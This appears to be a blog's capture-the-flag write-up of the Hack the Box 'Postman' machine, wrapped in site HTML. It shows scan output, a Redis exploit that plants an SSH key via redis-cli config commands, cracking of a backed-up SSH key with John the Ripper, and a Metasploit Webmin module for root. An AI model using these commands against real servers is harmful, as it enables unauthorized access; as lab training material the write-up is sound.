<!DOCTYPE html>





<html lang="en" 
  
    mode="dark"
  
 >

  <!--
  The Head
  v2.0
  https://github.com/cotes2020/jekyll-theme-chirpy
  © 2017-2019 Cotes Chung
  MIT License
-->

<head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="theme" content="Chirpy v2.5.1">

  <title>Hack the Box - Postman | Quantumly Confused
  </title>

  <meta name="description" content="HTB Postman machine walkthrough. Postman was a quick, simple machine from HTB. We start off with a redis exploit for initial foothold, then pivot to user by using JTR to crack a backup SSH key before finally using an authenticated Webmin exploit to escalate ourselves to root.">
  <meta name="keywords" content="hackthebox,htb,pentest,redteam,infosec,cybersecurity,postman,redis,webmin,metasploit,john,john the ripper,jtr">
  <link rel="canonical" href="https://blog.quantumlyconfused.com/hack-the-box/2020/03/14/htb-machine-postman/" />

  <meta name="twitter:title" content="HacktheBox Writeup - Postman - QuantumlyConfused">
  <meta name="twitter:description" content="HTB Postman machine walkthrough. Postman was a quick, simple machine from HTB. We start off with a redis exploit for...">
  <meta name="twitter:image" content="https://blog.quantumlyconfused.com/assets/htb-postman/infocard.PNG">
  <meta name="twitter:card" content="summary_large_image">
  <meta name="twitter:site" content="@_PatrickDowning" />
  <meta name="twitter:creator" content="@_PatrickDowning" />

  <meta property="og:title" content="HacktheBox Writeup - Postman - QuantumlyConfused">
  <meta property="og:description" content="HTB Postman machine walkthrough. Postman was a quick, simple machine from HTB. We start off with a redis exploit for...">
  <meta property="og:image" content="https://blog.quantumlyconfused.com/assets/htb-postman/infocard.PNG">
  <meta property="og:url" content="https://blog.quantumlyconfused.com/hack-the-box/2020/03/14/htb-machine-postman/">

  <!--
  The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps
  Generated by: https://www.favicon-generator.org/
  v2.0
  https://github.com/cotes2020/jekyll-theme-chirpy
  © 2019 Cotes Chung
  Published under the MIT license
-->



<link rel="shortcut icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon">
<link rel="icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon">

<link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon.png">
<link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon-precomposed.png">
<link rel="apple-touch-icon" sizes="57x57" href="/assets/img/favicons/apple-icon-57x57.png">
<link rel="apple-touch-icon" sizes="60x60" href="/assets/img/favicons/apple-icon-60x60.png">
<link rel="apple-touch-icon" sizes="72x72" href="/assets/img/favicons/apple-icon-72x72.png">
<link rel="apple-touch-icon" sizes="76x76" href="/assets/img/favicons/apple-icon-76x76.png">
<link rel="apple-touch-icon" sizes="114x114" href="/assets/img/favicons/apple-icon-114x114.png">
<link rel="apple-touch-icon" sizes="120x120" href="/assets/img/favicons/apple-icon-120x120.png">
<link rel="apple-touch-icon" sizes="144x144" href="/assets/img/favicons/apple-icon-144x144.png">
<link rel="apple-touch-icon" sizes="152x152" href="/assets/img/favicons/apple-icon-152x152.png">
<link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-icon-180x180.png">

<link rel="icon" type="image/png" sizes="192x192"  href="/assets/img/favicons/android-icon-192x192.png">
<link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="96x96" href="/assets/img/favicons/favicon-96x96.png">
<link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png">

<link rel="manifest" href="/assets/img/favicons/manifest.json">
<meta name='msapplication-config' content='/assets/img/favicons/browserconfig.xml'>
<meta name="msapplication-TileColor" content="#ffffff">
<meta name="msapplication-TileImage" content="/assets/img/favicons/ms-icon-144x144.png">
<meta name="theme-color" content="#ffffff">


  <!-- Google Fonts -->
  <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="anonymous">
  <link rel="dns-prefetch" href="https://fonts.gstatic.com">

  <!-- GA -->
    <link rel="preconnect" href="https://www.google-analytics.com" crossorigin="use-credentials">
    <link rel="dns-prefetch" href="https://www.google-analytics.com">

    <link rel="preconnect" href="https://www.googletagmanager.com" crossorigin="anonymous">
    <link rel="dns-prefetch" href="https://www.googletagmanager.com">

    

    <!-- Global site tag (gtag.js) - Google Analytics-->

<meta name="google-site-verification" content="4x5Z0Ong7lBlu0f5GVm2D_Fma9DU4A_GvFaBJA5lOOo" />
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-148947358-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  
  gtag('js', new Date());
  gtag('config', 'UA-148947358-1');
</script>



  <!-- jsDelivr CDN -->
  <link rel="preconnect" href="cdn.jsdelivr.net">
  <link rel="dns-prefetch" href="cdn.jsdelivr.net">

  <!-- Bootstrap -->
  <link rel="stylesheet"
    href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css"
    integrity="sha256-LA89z+k9fjgMKQ/kq4OO2Mrf8VltYml/VES+Rg0fh20=" crossorigin="anonymous">

  <!-- Font Awesome -->
  <link rel="stylesheet"
    href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css"
    integrity="sha256-+N4/V/SbAFiW1MPBCXnfnP9QSN3+Keu+NlB+0ev/YKQ="
    crossorigin="anonymous">

  <!--
  CSS selector for site.
  Chirpy v2.3
  https://github.com/cotes2020/jekyll-theme-chirpy
  © 2020 Cotes Chung
  MIT Licensed
-->



  <link rel="preload" as="style" href="/assets/css/post.css">
  <link rel="stylesheet" href="/assets/css/post.css">

  

    <link rel="preload" as="style" href="/assets/css/lib/bootstrap-toc.min.css">
    <link rel="stylesheet" href="/assets/css/lib/bootstrap-toc.min.css" />

  




  <!-- JavaScripts -->

  <script src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script>

  <script async
    src="https://cdn.jsdelivr.net/combine/npm/popper.js@1.15.0,npm/bootstrap@4/dist/js/bootstrap.min.js"></script>

  <!--
  JS selector for site.
  Chirpy v2.3
  https://github.com/cotes2020/jekyll-theme-chirpy
  © 2020 Cotes Chung
  MIT Licensed
-->



  <script async src="/assets/js/post.min.js"></script>

  





  <!-- PWA -->
  <script defer src="/app.js"></script>



  <script data-ad-client="ca-pub-1349331648978464" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>

  <!-- Cookie Consent by https://www.PrivacyPolicies.com -->
  <script type="text/javascript" src="//www.privacypolicies.com/public/cookie-consent/4.0.0/cookie-consent.js"></script>
  <script type="text/javascript">
  document.addEventListener('DOMContentLoaded', function () {
  cookieconsent.run({"notice_banner_type":"headline","consent_type":"express","palette":"dark","language":"en","website_name":"https://blog.quantumlyconfused.com","website_privacy_policy_url":"https://blog.quantumlyconfused.com/tabs/disclaimer/"});
  });
  </script>
  <noscript><a href="https://www.PrivacyPolicies.com/cookie-consent/">Cookie Consent by PrivacyPolicies.com</a></noscript>

</head>


  <body data-spy="scroll" data-target="#toc">

    <div id="sidebar" class="d-flex flex-column">
      <!--
  The Side Bar
  v2.0
  https://github.com/cotes2020/jekyll-theme-chirpy
  © 2017-2019 Cotes Chung
  MIT License
-->

<div id="nav-wrapper">
  <div id="profile-wrapper" class="d-flex flex-column">
    <div id="avatar" class="d-flex justify-content-center">
      <a href="/" alt="avatar">
        
        
        
        <img src="/assets/img/sample/padraignix.png" alt="avatar" onerror="this.style.display='none'">
      </a>
    </div>

    <div class="profile-text mt-3">
      <div class="site-title">
        <a href="/">Quantumly Confused</a>
      </div>
      <div class="site-subtitle font-italic">Quantum, InfoSec, Crypto, CTFs, and related adventures</div>
    </div>
  </div>

  <ul class="nav flex-column">
  

  
    

    

    <li class="nav-item d-flex justify-content-center
      ">
      <a href="/" class="nav-link d-flex justify-content-center align-items-center w-100">
        <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i>
        <span>HOME</span>
      </a>
    </li> <!-- .nav-item -->
  
    

    

    <li class="nav-item d-flex justify-content-center
      ">
      <a href="/tabs/projects/" class="nav-link d-flex justify-content-center align-items-center w-100">
        <i class="fa-fw fas fa-puzzle-piece ml-xl-3 mr-xl-3 unloaded"></i>
        <span>PROJECTS</span>
      </a>
    </li> <!-- .nav-item -->
  
    

    

    <li class="nav-item d-flex justify-content-center
      ">
      <a href="/tabs/categories/" class="nav-link d-flex justify-content-center align-items-center w-100">
        <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i>
        <span>CATEGORIES</span>
      </a>
    </li> <!-- .nav-item -->
  
    

    

    <li class="nav-item d-flex justify-content-center
      ">
      <a href="/tabs/tags/" class="nav-link d-flex justify-content-center align-items-center w-100">
        <i class="fa-fw fas fa-tags ml-xl-3 mr-xl-3 unloaded"></i>
        <span>TAGS</span>
      </a>
    </li> <!-- .nav-item -->
  
    

    

    <li class="nav-item d-flex justify-content-center
      ">
      <a href="/tabs/archives/" class="nav-link d-flex justify-content-center align-items-center w-100">
        <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i>
        <span>ARCHIVES</span>
      </a>
    </li> <!-- .nav-item -->
  
    

    

    <li class="nav-item d-flex justify-content-center
      ">
      <a href="/tabs/about/" class="nav-link d-flex justify-content-center align-items-center w-100">
        <i class="fa-fw fas fa-info ml-xl-3 mr-xl-3 unloaded"></i>
        <span>ABOUT</span>
      </a>
    </li> <!-- .nav-item -->
  

  </ul> <!-- ul.nav.flex-column -->

</div><!-- #nav-wrapper -->

<div class="sidebar-bottom d-flex flex-wrap justify-content-around mt-4">

  

  
    

    
    <a href="https://twitter.com/_PatrickDowning" aria-label="twitter" target="_blank" rel="noopener">
      <i class="fab fa-twitter"></i>
    </a>
    
  
    

    
    <a href="https://www.linkedin.com/in/downingpatrick/" aria-label="linkedin" target="_blank" rel="noopener">
      <i class="fab fa-linkedin"></i>
    </a>
    
  
    

    
    <a href="https://www.reddit.com/user/Padraignix" aria-label="reddit" target="_blank" rel="noopener">
      <i class="fab fa-reddit-alien"></i>
    </a>
    
  
    

    
    <a href="https://github.com/padraignix" aria-label="github" target="_blank" rel="noopener">
      <i class="fab fa-github-alt"></i>
    </a>
    
  
    

    
    <a href="https://www.twitch.tv/padraignix" aria-label="hackthebox" target="_blank" rel="noopener">
      <i class="fab fa-twitch"></i>
    </a>
    
  
    

    
    <a href="/feed.xml" aria-label="rss" >
      <i class="fas fa-rss"></i>
    </a>
    
  

</div>

    </div>

    <!--
  The Top Bar
  v2.0
  https://github.com/cotes2020/jekyll-theme-chirpy
  © 2017-2019 Cotes Chung
  MIT License
-->
<div id="topbar-wrapper" class="row justify-content-center topbar-down">
  <div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between">
    <span id="breadcrumb">
      
        
        <span>
          <a href="/">
            Posts
          </a>
        </span>
        
      

      
        <span>Hack the Box - Postman</span>
      

    </span><!-- endof #breadcrumb -->

    <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i>

    <div id="topbar-title">
    Post
    </div>

    <i id="search-trigger" ></i>
    <!--<span id="search-wrapper" class="align-items-center">
      <i class="fas fa-search fa-fw"></i>
      <input class="form-control" id="search-input" type="search"
        aria-label="search" placeholder="Search...">
      <i class="fa fa-times-circle fa-fw" id="search-cleaner"></i>
    </span>-->
    <span id="search-cancel" >Cancel</span>
    <!--<i id="search-trigger" class="fas fa-search fa-fw"></i>
    <span id="search-wrapper" class="align-items-center">
      <i class="fas fa-search fa-fw"></i>
      <input class="form-control" id="search-input" type="search"
        aria-label="search" autocomplete="off" placeholder="...">
      <i class="fa fa-times-circle fa-fw" id="search-cleaner"></i>-->
    </span>
    <span id="search-cancel" ></span>
  </div>

</div>


    <div id="main-wrapper">
      <div id="main">

        <!--
  Refactor the HTML structure.
-->



<!--
  Suroundding the markdown table with '<div class="table-wrapper">. and '</div>'
-->



<!--
  Fixed kramdown code highlight rendering:
  https://github.com/penibelst/jekyll-compress-html/issues/101
  https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901
-->


<div class="row">

  <div id="post-wrapper" class="col-12 col-lg-11 col-xl-8">

    <div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4">

      <h1 data-toc-skip>Hack the Box - Postman</h1>

      <div class="post-meta text-muted d-flex flex-column">
        <!-- Published date and author -->
        <div>
          Posted
          <!--
  Date format snippet

  v2.4.1
  https://github.com/cotes2020/jekyll-theme-chirpy
  © 2020 Cotes Chung
  MIT License
-->
<span class="timeago "
  
    data-toggle="tooltip"
    data-placement="bottom"
    title="Sat, Mar 14, 2020, 12:00 PM -0400"
  >

  
  

  
    Mar 14, 2020
  

  <i class="unloaded">2020-03-14T12:00:00-04:00</i>

</span>
          by
          <span class="author">
          
            Patrick Downing
          
          </span>
        </div>

        <!-- lastmod -->
          
          
        
          
          
        
          
          
        
          
          
        
          
          
        
          
          
        
          
          
        
          
          
        
          
          
        
          
          
        
          
          
        
          
          
        
          
          
        
          
          
        
          
          
        
          
          
        

        

        <!-- page views -->
        

      </div> <!-- .post-meta -->

      <div class="post-content">

        

        <!-- Using lozad. See: <https://github.com/ApoorvSaxena/lozad.js#usage> -->
        
          
          <h1>Introduction</h1>
<p>
<img width="75%" height="75%" src="/assets/htb-postman/infocard.PNG" />
</p>

<p>Postman was a quick, simple machine from HTB. We start off with a redis exploit for initial foothold, then pivot to user by using JTR to crack a backup SSH key before finally using an authenticated Webmin exploit to escalate ourselves to root. The only real tricky part of the machine was having to do a bit of guess work of the redis user's home directory. Otherwise, this machine was a welcome mental break from some of the previous harder ones like <a href="/hack-the-box/2020/03/07/htb-machine-bankrobber/">Bankrobber</a> or <a href="/hack-the-box/2020/03/01/htb-machine-zetta/">Zetta</a>.</p>

<h1>Initial Recon</h1>

<p>Let us kick things off with our regular NMAP scan.</p>

<figure class="highlight"><pre><code class="language-shell" data-lang="shell">root@kali:~/Desktop/HTB/Postman# nmap <span class="nt">-sV</span> <span class="nt">-sV</span> <span class="nt">-p-</span> 10.10.10.160
Starting Nmap 7.70 <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2019-11-03 15:06 EST
Nmap scan report <span class="k">for </span>10.10.10.160
Host is up <span class="o">(</span>0.017s latency<span class="o">)</span><span class="nb">.</span>
Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span>
80/tcp    open  http    Apache httpd 2.4.29 <span class="o">((</span>Ubuntu<span class="o">))</span>
6379/tcp  open  redis   Redis key-value store 4.0.9
10000/tcp open  http    MiniServ 1.910 <span class="o">(</span>Webmin httpd<span class="o">)</span>
Service Info: OS: Linux<span class="p">;</span> CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ <span class="nb">.</span>
Nmap <span class="k">done</span>: 1 IP address <span class="o">(</span>1 host up<span class="o">)</span> scanned <span class="k">in </span>83.02 seconds</code></pre></figure>

<p>Alright, so trusty SSH, an Apache instance, a redis instance, and seemingly another web-based Webmin instance. Checking out the Apache instance doesn't give us all too much information.</p>

<p>
<img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
        " data-src="/assets/htb-postman/recon-site.PNG" />
</p>

<p>Unfortunately even checking the source code does not reveal more value to this page. Let's try the Webmin instance and see if we can get any further.</p>

<p>
<img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
        " data-src="/assets/htb-postman/recon-site-miniserv.PNG" />
</p>

<p>Alright this looks a bit more promising. The downside is there is no version number listed anywhere. We can try logging in using admin/admin and other default sets of credentials, however no luck with that approach. If we take a look at searchsploit for potential exploits we have quite a few options.</p>

<p>
<img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
        " data-src="/assets/htb-postman/recon-webmin-searchsploit.PNG" />
</p>

<p>We can rule out the authenticated exploits for now since we don't have a sets of credentials. After a bit of trial and error nothing pans out with the Webmin angle. One last service to check, so let's take a look at redis.</p>

<h1>User exploitation</h1>

<p>Immediately upon searching I find a several redis exploit examples. The most interesting example was from the redis author about the security of the underlaying <a href="http://antirez.com/news/96">AUTH model</a>. There is even an available <a href="https://github.com/Avinash-acid/Redis-Server-Exploit/blob/master/redis.py">repo</a> where this has been scripted up. Perfect, let's see if we can use this to get an initial shell.</p>

<figure class="highlight"><pre><code class="language-shell" data-lang="shell">root@kali:~/Desktop/HTB/Postman# python redis2.py 10.10.10.160 redis
	<span class="k">*******************************************************************</span>
	<span class="k">*</span> <span class="o">[</span>+] <span class="o">[</span>Exploit] Exploiting misconfigured REDIS SERVER<span class="k">*</span>
	<span class="k">*</span> <span class="o">[</span>+] AVINASH KUMAR THAPA aka <span class="s2">"-Acid"</span>                                
	<span class="k">*******************************************************************</span>


	 SSH Keys Need to be Generated
Generating public/private rsa key pair.
Enter file <span class="k">in </span>which to save the key <span class="o">(</span>/root/.ssh/id_rsa<span class="o">)</span>: 
/root/.ssh/id_rsa already exists.
Overwrite <span class="o">(</span>y/n<span class="o">)</span>? y
Enter passphrase <span class="o">(</span>empty <span class="k">for </span>no passphrase<span class="o">)</span>: 
Enter same passphrase again: 
Your identification has been saved <span class="k">in</span> /root/.ssh/id_rsa.
Your public key has been saved <span class="k">in</span> /root/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:ehV0s6WYeZuU4WmOxs6sjnjY7ARUjlWUqy1tpaKW0X8 acid_creative
The key<span class="s1">'s randomart image is:
+---[RSA 2048]----+
|      ooo.. + .  |
|     =  .. * O   |
|    o .  .= X    |
|   .    ...B o   |
|    .. +So= +    |
|    ..=.=*       |
|     Bo=. +      |
|    =o+o..E      |
|   ..oo.o.       |
+----[SHA256]-----+
	 Keys Generated Successfully
OK
OK
OK
OK
OK
OK
	You'</span>ll get shell <span class="k">in </span>sometime..Thanks <span class="k">for </span>your patience</code></pre></figure>

<p>Here is where the frustration starts... everything _seemed_ to be going well, however I did not end up getting the shell. I tried a few different variants, including running the exploit commands manually, even trying the Metasploit module which would attempt to exploit the same angle - all unsuccessfully. After a lot of headscratching and searching around I found an interesting nuance. The exploit was trying to use the "home" directory of:</p>

<figure class="highlight"><pre><code class="language-shell" data-lang="shell">cmd4 <span class="o">=</span> cmd1 + <span class="s1">' config set  dir'</span> + <span class="s2">" /home/"</span>+username+<span class="s2">"/.ssh/"</span></code></pre></figure>

<p>However we find that a redis user sometimes uses /var/lib/. If this is the case the exploit would definitely not work as-is. Let's try modifying the exploit and using the modified home directory.</p>

<figure class="highlight"><pre><code class="language-shell" data-lang="shell">root@kali:~/Desktop/HTB/Postman# python redis2.py 10.10.10.160 redis
	<span class="k">*******************************************************************</span>
	<span class="k">*</span> <span class="o">[</span>+] <span class="o">[</span>Exploit] Exploiting misconfigured REDIS SERVER<span class="k">*</span>
	<span class="k">*</span> <span class="o">[</span>+] AVINASH KUMAR THAPA aka <span class="s2">"-Acid"</span>                                
	<span class="k">*******************************************************************</span>


	 SSH Keys Need to be Generated
Generating public/private rsa key pair.
Enter file <span class="k">in </span>which to save the key <span class="o">(</span>/root/.ssh/id_rsa<span class="o">)</span>: 
/root/.ssh/id_rsa already exists.
Overwrite <span class="o">(</span>y/n<span class="o">)</span>? y
Enter passphrase <span class="o">(</span>empty <span class="k">for </span>no passphrase<span class="o">)</span>: 
Enter same passphrase again: 
Your identification has been saved <span class="k">in</span> /root/.ssh/id_rsa.
Your public key has been saved <span class="k">in</span> /root/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:ehV0s6WYeZuU4WmOxs6sjnjY7ARUjlWUqy1tpaKW0X8 acid_creative
The key<span class="s1">'s randomart image is:
+---[RSA 2048]----+
|      ooo.. + .  |
|     =  .. * O   |
|    o .  .= X    |
|   .    ...B o   |
|    .. +So= +    |
|    ..=.=*       |
|     Bo=. +      |
|    =o+o..E      |
|   ..oo.o.       |
+----[SHA256]-----+
	 Keys Generated Successfully
OK
OK
OK
OK
OK
OK
	You'</span>ll get shell <span class="k">in </span>sometime..Thanks <span class="k">for </span>your patience
Welcome to Ubuntu 18.04.3 LTS <span class="o">(</span>GNU/Linux 4.15.0-58-generic x86_64<span class="o">)</span>

 <span class="k">*</span> Documentation:  https://help.ubuntu.com
 <span class="k">*</span> Management:     https://landscape.canonical.com
 <span class="k">*</span> Support:        https://ubuntu.com/advantage


 <span class="k">*</span> Canonical Livepatch is available <span class="k">for </span>installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch
Last login: Mon Aug 26 03:04:25 2019 from 10.10.10.1
redis@Postman:~<span class="nv">$ </span><span class="nb">id
</span><span class="nv">uid</span><span class="o">=</span>107<span class="o">(</span>redis<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>114<span class="o">(</span>redis<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>114<span class="o">(</span>redis<span class="o">)</span>
redis@Postman:~<span class="nv">$ </span></code></pre></figure>

<p>Alright! We have a foothold! As a side note instead of a fancy script we could achieve the same result with the following manual commands then ssh'ing to the host directly.</p>

<figure class="highlight"><pre><code class="language-shell" data-lang="shell">redis-cli <span class="nt">-h</span> 10.10.10.160 flushall
<span class="nb">cat</span> /root/.ssh/public_key.txt | redis-cli <span class="nt">-h</span> 10.10.10.160 <span class="nt">-x</span> <span class="nb">set </span>cracklist
redis-cli <span class="nt">-h</span> 10.10.10.160 config <span class="nb">set </span>dbfilename <span class="s2">"backup.db"</span> 
redis-cli <span class="nt">-h</span> 10.10.10.160 config <span class="nb">set dir</span> /var/lib/redis/.ssh/
redis-cli <span class="nt">-h</span> 10.10.10.160 config <span class="nb">set </span>dbfilename <span class="s2">"authorized_keys"</span>
redis-cli <span class="nt">-h</span> 10.10.10.160 save</code></pre></figure>

<p>Now that we are in, it seems that our redis user does not has access to the flag - unfortunate. We need to do a bit more digging at this point. Right in the redis home directory we see an interesting .bash_history file. Let's see if we can pick out any interesting details from there.</p>

<p>
<img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
        " data-src="/assets/htb-postman/user-bashhistory.PNG" />
</p>

<p>Excellent. We now know there is a user <code>Matt</code> and it looks like they may have backed up their SSH private key... hum, maybe we can find the file laying around.</p>

<p>
<img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
        " data-src="/assets/htb-postman/user-rsaback.PNG" />
</p>

<p>Oh-ho ho! Password protected says you. Cracking time says me. Let's get the file over to our machine and start the process. First we need to run it through sshng2john.py to get the file in a format JTR will understand.</p>

<figure class="highlight"><pre><code class="language-shell" data-lang="shell">root@kali:~/Desktop/HTB/Postman# python sshng2john.py matt.key <span class="o">&gt;</span> matt.hash
root@kali:~/Desktop/HTB/Postman# <span class="nb">cat </span>matt.hash
24
matt.key:<span class="nv">$sshng$0$8$73E9CEFBCCF5287C$1192$25e840e75235eebb0238e56ac96c7e0bcdfadc8381617435d43770fe9af72f6036343b41eedbec5cdcaa2838217d09d77301892540fd90a267889909cebbc5d567a9bcc3648fd648b5743360df306e396b92ed5b26ae719c95fd1146f923b936ec6b13c2c32f2b35e491f11941a5cafd3e74b3723809d71f6ebd5d5c8c9a6d72cba593a26442afaf8f8ac928e9e28bba71d9c25a1ce403f4f02695c6d5678e98cbed0995b51c206eb58b0d3fa0437fbf1b4069a6962aea4665df2c1f762614fdd6ef09cc7089d7364c1b9bda52dbe89f4aa03f1ef178850ee8b0054e8ceb37d306584a81109e73315aebb774c656472f132be55b092ced1fe08f11f25304fe6b92c21864a3543f392f162eb605b139429bb561816d4f328bb62c5e5282c301cf507ece7d0cf4dd55b2f8ad1a6bc42cf84cb0e97df06d69ee7b4de783fb0b26727bdbdcdbde4bb29bcafe854fbdbfa5584a3f909e35536230df9d3db68c90541d3576cab29e033e825dd153fb1221c44022bf49b56649324245a95220b3cae60ab7e312b705ad4add1527853535ad86df118f8e6ae49a3c17bee74a0b460dfce0683cf393681543f62e9fb2867aa709d2e4c8bc073ac185d3b4c0768371360f737074d02c2a015e4c5e6900936cca2f45b6b5d55892c2b0c4a0b01a65a5a5d91e3f6246969f4b5847ab31fa256e34d2394e660de3df310ddfc023ba30f062ab3aeb15c3cd26beff31c40409be6c7fe3ba8ca13725f9f45151364157552b7a042fa0f26817ff5b677fdd3eead7451decafb829ddfa8313017f7dc46bafaac7719e49b248864b30e532a1779d39022507d939fcf6a34679c54911b8ca789fef1590b9608b10fbdb25f3d4e62472fbe18de29776170c4b108e1647c57e57fd1534d83f80174ee9dc14918e10f7d1c8e3d2eb9690aa30a68a3463479b96099dee8d97d15216aec90f2b823b207e606e4af15466fff60fd6dae6b50b736772fdcc35c7f49e5235d7b052fd0c0db6e4e8cc6f294bd937962fab62be9fde66bf50bb149ca89996cf12a54f91b1aa2c2c6299ea9da821ef284529a5382b18d080aaede451864bb352e1fdcff981a36b505a1f2abd3a024848e0f3234ef73f3e2dda0dd7041630f695c11063232c423c7153277bbe671cb4b483f08c266fc547d89ff2b81551dabef03e6fd968a67502100111a7022ff3eb58a1fc065692d50b40eb379f155d37c1d97f6c2f5a01de13b8989174677c89d8a644758c071aea8d4c56a0374801732348db0b3164dcc82b6eaf3eb3836fa05cf5476258266a30a531e1a3132e11b944e8e0406cad59ffeaecc1ab3b7705db99353c458dc9932a638598b195e25a14051e414e20dc1510eb476a467f4e861a51036d453ea96721e0be34f4993a34b778d4111b29a63d69c1b8200869a129392684af8c4daa32f3d0a0d17c36275f039b4a3bf29e9436b912b9ed42b168c47c4205dcd00c114da8f8d82af761e69e900545eb6fc10ef1ba4934adb6fa9af17c812a8b420ed6a5b645cad812d394e93d93ccd21f2d444f1845d261796ad055c372647f0e1d8a844b8836505eb62a9b6da92c0b8a2178bad1eafbf879090c2c17e25183cf1b9f1876cf6043ea2e565fe84ae473e9a7a4278d9f00e4446e50419a641114bc626d3c61e36722e9932b4c8538da3ab44d63</span></code></pre></figure>

<p>Making sure we remove the extra line at the start, we can then run it through John.</p>

<figure class="highlight"><pre><code class="language-shell" data-lang="shell">root@kali:~/Desktop/HTB/Postman# john <span class="nt">--wordlist</span><span class="o">=</span>/root/Desktop/rockyou.txt matt.hash
Using default input encoding: UTF-8
Loaded 1 password <span class="nb">hash</span> <span class="o">(</span>SSH <span class="o">[</span>RSA/DSA/EC/OPENSSH <span class="o">(</span>SSH private keys<span class="o">)</span> 32/64]<span class="o">)</span>
Cost 1 <span class="o">(</span>KDF/cipher <span class="o">[</span><span class="nv">0</span><span class="o">=</span>MD5/AES <span class="nv">1</span><span class="o">=</span>MD5/3DES <span class="nv">2</span><span class="o">=</span>Bcrypt/AES]<span class="o">)</span> is 1 <span class="k">for </span>all loaded hashes
Cost 2 <span class="o">(</span>iteration count<span class="o">)</span> is 2 <span class="k">for </span>all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit <span class="nb">false </span>positives, so it will keep trying even after
finding a possible candidate.
Press <span class="s1">'q'</span> or Ctrl-C to abort, almost any other key <span class="k">for </span>status
computer2008     <span class="o">(</span>matt.key<span class="o">)</span>
1g 0:00:00:04 46.24% <span class="o">(</span>ETA: 17:14:59<span class="o">)</span> 0.2272g/s 1529Kp/s 1529Kc/s 1529KC/s kapoo823..kapone4115
Session aborted</code></pre></figure>

<p>Perfect! We now have a set of credentials - <code>Matt/computer2008</code>. All that is left is to impersonate Matt.</p>

<p>
<img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
        " data-src="/assets/htb-postman/user-owned.PNG" />
</p>

<p>User down, time to hunt root!</p>

<h1>Root exploitation</h1>

<p>Root was a little simpler than getting user, mainly because we already did the recon required for escalation without knowing it at the time. Once we acquired the shell as Matt some poking around didn't really give us a logical next step. Now with a set of credentials however, maybe we can go back and use some of those authenticated Webmin exploits? First let's log in to the Webmin portal and see if we can find any additional information - maybe something like a version number.</p>

<p>Sure enough, right on the home page we see that it is running version 1.910. If we go back up to our Webmin searchsploit output.</p>

<p>
<img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
        " data-src="/assets/htb-postman/recon-webmin-searchsploit.PNG" />
</p>

<p>We see that there is a metasploit module for the exact version. Let's get it configured and see if it works as is, or if we need to tweak anything as we did with the previous redis exploit!</p>

<p>
<img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
        " data-src="/assets/htb-postman/root-msfoptions.PNG" />
</p>

<p>Alright, and now if we kick it off...</p>

<p>
<img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
        " data-src="/assets/htb-postman/root-owned.PNG" />
</p>

<p>And just like that, our journey with Postman is complete. Thanks folks, until next time.</p>

        
      </div>

      <div class="post-tail-wrapper text-muted">

        <!-- categories -->
        
        <div class="post-meta mb-3">
          <i class="far fa-folder-open fa-fw mr-1"></i>
          
            <a href='/categories/hack-the-box/'>hack-the-box</a>
        </div>
        

        <!-- tags -->
        
        <div class="post-tags">
          <i class="fa fa-tags fa-fw mr-1"></i>
          
          <a href="/tags/htb/"
            class="post-tag no-text-decoration" >htb</a>
          
          <a href="/tags/redis/"
            class="post-tag no-text-decoration" >redis</a>
          
          <a href="/tags/webmin/"
            class="post-tag no-text-decoration" >webmin</a>
          
